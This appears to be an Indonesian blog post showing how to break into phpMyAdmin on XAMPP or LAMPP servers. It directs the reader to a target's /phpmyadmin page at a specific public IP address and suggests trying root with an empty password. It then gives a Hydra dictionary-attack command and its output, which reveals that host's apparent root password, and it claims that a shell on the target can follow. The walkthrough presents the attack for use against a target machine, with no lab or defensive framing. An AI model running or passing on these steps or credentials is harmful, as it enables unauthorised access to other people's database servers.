Hasilnya seperti dibawah ini :
Bahasan kita saat ini dalah hacking password phpmyadmin, maka tentu dikomputer target telah terinstall APACHE, MySQL dan PHPmyAdmin dan aktif, umumnya yang sudah dalam 1 paket ada yang namanya XAMPP untuk Windows dan LAMPP untuk linux.
Setelah IP Target telah diketahui maka kita dapat copy paste IP-nya ke browser dengan ditambahkan /phpmyadmim.
Hasilnya setelah kita masukkan http://180.254.111.31/phpmyadmin adalah :
Secara umum mungkin penyerang tidak terlalu menyukai jika tampil tampilan seperti diatas karena kemungkinan phpmyadmin dipassword adalah lebih besar, tapi dapat juga dicoba misal dengan menggunakan akses user Name root dan Password dikosongkan, jika cara inipun gagal maka kita dapat mencoba melakukan serangan dictionary attack denga hydra sebagai berikut.
H:\hydra>hydra -m /phpmyadmin/ -l root -P pass.txt 180.254.111.31 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes
Hydra (http://www.thc.org) starting at 2011-10-23 22:07:11
[DATA] 7 tasks, 1 servers, 7 login tries (l:1/p:7), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.111.31 (waiting for childs to finish)
[80][www] host: 180.254.111.31 login: root password: lintas5
Hydra (http://www.thc.org) finished at 2011-10-23 22:07:13
Binggo diatas, password kita dapat yaitu passwordnya adalah lintas5. Dengan kita mengetahui passwordnya maka kita dapat login ke phpmyadmin, dengan sedikit exploitasi anda dapat mengakses shell di komputer target.
0 komentar:
Posting Komentar